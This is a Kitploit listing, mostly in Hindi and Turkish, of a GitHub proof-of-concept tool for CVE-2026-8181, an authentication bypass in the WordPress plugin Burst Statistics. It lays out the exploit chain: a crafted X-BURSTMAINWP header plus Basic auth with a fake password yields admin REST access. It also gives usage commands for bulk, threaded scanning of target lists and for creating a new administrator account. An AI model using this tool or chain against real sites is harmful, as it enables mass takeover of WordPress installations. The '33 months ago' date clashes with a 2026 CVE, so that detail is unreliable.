Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/murrez/cve-2026-8181
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगप्रमाणीकरण
GitHubmurrez/cve-2026-8181

CVE-2026-8181

CVE-2026-8181 PoC: Burst Statistics (3.4.0–3.4.1.1) प्रमाणीकरण बायपास। पायथन टूल — एकल और बहु-लक्ष्य स्कैन, थ्रेडेड वर्कर्स, TXT रिपोर्ट। केवल अधिकृत परीक्षण। अनुरक्षक: mürrez।

रिपॉजिटरी देखें
33 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
टाइपिंग परिचय EN
टाइपिंग परिचय TR
टैगलाइन EN/TR



CVE CVSS WP Python

EN: नियंत्रित PoC और Burst Statistics में प्रमाणीकरण बायपास के अधिकृत सुरक्षा परीक्षण के लिए संक्षिप्त तकनीकी नोट्स।

TR: Burst Statistics eklentisindeki kimlik doğrulama atlatası için yetkili güvenlik testi amaçlı kontrollü PoC ve kısa teknik özet.


परियोजना अवलोकन / Proje özeti

अंग्रेज़ी

नोट: WordPress.org पर 200,000+ सक्रिय इंस्टॉल का आंकड़ा प्लगइन का संपूर्ण उपयोगकर्ता आधार है — इसका मतलब नहीं है कि हर साइट कमजोर संस्करण चलाती है। वास्तविक प्रभाव के लिए संस्करण + वातावरण (HTTP / एप्लिकेशन-पासवर्ड उपलब्धता, आदि) की जाँच आवश्यक है।

Türkçe

Not: WordPress.org’daki 200.000+ aktif kurulum sayısı eklentinin tüm kullanıcı tabanıdır; sitelerin tamamının zafiyetli sürümde olduğu anlamına gelmez. Gerçek etki için sürüm + ortam (HTTP, uygulama parolası uygunluğu vb.) doğrulanmalıdır.


दृश्य / Dokümantasyon görselleri

अंग्रेज़ी

GitHub-फ्लेवर्ड Markdown बिना किसी फ़ाइल को रिपॉजिटरी में रखे बाइनरी GIF एम्बेड नहीं करता। ऊपर दिए गए Typing SVG स्निपेट (CDN) गति का अनुकरण करते हैं। अपना खुद का स्क्रीन कैप्चर जोड़ने के लिए:

root@kitploit:~
![Lab demo](https://raw.githubusercontent.com/murrez/cve-2026-8181/HEAD/assets/demo.gif)

Türkçe

GitHub Markdown, repoda dosya olmadan GIF gömmeyi desteklemez. Üstteki Typing SVG (CDN) yazı animasyonu verir. Kendi demosun için:

root@kitploit:~
![Lab demo](https://raw.githubusercontent.com/murrez/cve-2026-8181/HEAD/assets/demo.gif)

आक्रमण श्रृंखला (Mermaid) / Saldırı zinciri

अंग्रेज़ी — आरेख लेबल

root@kitploit:~
flowchart LR
  A[Client request] --> B[X-BURSTMAINWP: 1]
  A --> C[Authorization: Basic]
  B --> D[plugins_loaded]
  D --> E[is_mainwp_authenticated]
  E --> F{wp_authenticate_application_password == null?}
  F -->|Mis-handled branch| G[get_user_by login]
  G --> H[wp_set_current_user]
  H --> I[REST: full admin context]

Türkçe — aynı akış

root@kitploit:~
flowchart LR
  A[İstek] --> B[X-BURSTMAINWP: 1]
  A --> C[Authorization: Basic]
  B --> D[plugins_loaded]
  D --> E[is_mainwp_authenticated]
  E --> F{wp_authenticate_application_password == null?}
  F -->|Yanlış dal| G[get_user_by login]
  G --> H[wp_set_current_user]
  H --> I[REST: tam admin bağlamı]

उपकरण विशेषताएँ / Araç yetenekleri

अंग्रेज़ी

-f के साथ, -o और --output-dir परस्पर अनन्य हैं।

Türkçe

-f modunda -o ile --output-dir aynı anda kullanılamaz.


स्थापना / Kurulum

root@kitploit:~
pip3 install requests urllib3

उपयोग उदाहरण / Kullanım örnekleri

अंग्रेज़ी

root@kitploit:~
# Single site, report file
python3 CVE-2026-8181.py -u http://lab.local -U admin -o report.txt -k

# Single site + new admin (lab)
python3 CVE-2026-8181.py -u http://lab.local -U admin --create-user -o report.txt -k

# Bulk + combined file (successes only)
python3 CVE-2026-8181.py -f targets.txt -j 20 -o successes.txt -k

# Bulk + per-host files in folder (successes only)
python3 CVE-2026-8181.py -f targets.txt -j 20 --output-dir ./results -k

Türkçe

root@kitploit:~
# Tek site, rapor
python3 CVE-2026-8181.py -u http://lab.local -U admin -o sonuc.txt -k

# Tek site + yeni yönetici (lab)
python3 CVE-2026-8181.py -u http://lab.local -U admin --create-user -o sonuc.txt -k

# Çoklu + birleşik dosya (yalnızca başarılılar)
python3 CVE-2026-8181.py -f targets.txt -j 20 -o basarili.txt -k

# Çoklu + klasörde site başına dosya (yalnızca başarılılar)
python3 CVE-2026-8181.py -f targets.txt -j 20 --output-dir ./results -k

खाली Password: फ़ील्ड / Boş parola satırı

अंग्रेज़ी

सफल बायपास पीड़ित उपयोगकर्ता का वास्तविक पासवर्ड लीक नहीं करता — PoC में Basic पासवर्ड नकली होता है। Password: पंक्ति खाली रहती है जब तक --create-user एक नया खाता नहीं बनाता (तब उत्पन्न पासवर्ड लिखा जाता है)।

Türkçe

Başarılı bypass mevcut kullanıcının gerçek parolasını sızdırmaz — PoC’taki Basic parola sahtedir. Password: satırı --create-user ile yeni hesap oluşturulmadıkça boş kalır; oluşturulduysa üretilen şifre yazılır.


संदर्भ / Kaynaklar

अंग्रेज़ी

  • Burst Statistics — WordPress प्लगइन निर्देशिका
  • समन्वित प्रकटीकरण में अक्सर उद्धृत: Wordfence Threat Intelligence, PRISM
  • CVE: MITRE CVE-2026-8181 · NVD

Türkçe

  • Burst Statistics — WordPress eklenti dizini
  • Koordineli açıklamada sık geçen: Wordfence Threat Intelligence, PRISM
  • CVE: MITRE CVE-2026-8181 · NVD

अस्वीकरण / Feragatname

अंग्रेज़ी

केवल लिखित-अधिकृत मूल्यांकन और आपकी अपनी लैब के लिए। कई क्षेत्राधिकारों में अनधिकृत उपयोग अवैध है। लेखक और इस README के अनुरक्षक दुरुपयोग के लिए कोई दायित्व स्वीकार नहीं करते हैं।

Türkçe

Yazılı izinli değerlendirmeler ve kendi laboratuvarınız içindir. İzinsiz kullanım birçok ülkede yasadışıdır. Yazarlar ve bu README’nin düzenleyicisi kötüye kullanımdan sorumlu değildir.

टूल डाउनलोड करें
फ़ील्डविवरण
क्याप्रमाणीकरण बायपास (CWE-287) Burst Statistics में: गढ़े गए हेडर REST अनुरोधों को पूर्ण व्यवस्थापक संदर्भ तक बढ़ा सकते हैं।
संस्करणकमजोर: 3.4.0, 3.4.1, 3.4.1.1 · उपयोग करें: 3.4.2 या नया
गंभीरताCVSS ~9.8 (क्रिटिकल); लागू स्थितियों में रिमोट, बिना प्रमाणीकरण के।
यह रिपॉजिटरीCVE-2026-8181.py — लैब स्वचालन: एकल लक्ष्य, बल्क सूची, थ्रेड पूल, चयनात्मक TXT आउटपुट।
AlanDetay
NeBurst Statistics için kimlik doğrulama atlatası (CWE-287). Özel başlıklar ile REST isteğinde tam yönetici bağlamı.
SürümEtkilenir: 3.4.0, 3.4.1, 3.4.1.1 · Önerilir: 3.4.2 ve üzeri
CiddiyetCVSS ~9.8 (Critical); uygun koşullarda uzaktan ve kimlik gerektirmeden.
Bu depoCVE-2026-8181.py — lab otomasyonu: tek hedef, liste taraması, iş parçacığı havuzu, seçici TXT çıktısı.
फ़ीचरविवरण
एकल लक्ष्य-u बेस URL
बल्क लक्ष्य-f targets.txt (प्रति पंक्ति एक URL; # टिप्पणियाँ)
समवर्तीता-j N कार्यकर्ता (सीमित)
संयुक्त फ़ाइल-o file.txt — -f के साथ, केवल सफल एक्सप्लॉइट जोड़े जाते हैं
प्रति-होस्ट फ़ाइलें--output-dir — केवल सफल होस्ट्स को host.txt मिलता है (विफलताएँ छोड़ दी जाती हैं)
नया व्यवस्थापक--create-user — REST के माध्यम से यादृच्छिक उपयोगकर्ता (पासवर्ड फिर रिपोर्ट में दिखाई देता है)
TLS (लैब)-k प्रमाणपत्र सत्यापन अक्षम करता है (केवल विश्वसनीय लैब्स)
ÖzellikAçıklama
Tek hedef-u kök adres
Çoklu hedef-f targets.txt (satır başına URL; # yorumu)
Paralellik-j N işçi (üst sınırlı)
Tek dosya-o dosya.txt — -f ile yalnızca başarılı exploit eklenir
Klasör çıktısı--output-dir — sadece başarılılar host.txt alır
Yeni admin--create-user — REST ile rastgele kullanıcı (şifre raporda)
TLS (lab)-k sertifika doğrulamasını kapatır (yalnızca güvenilir lab)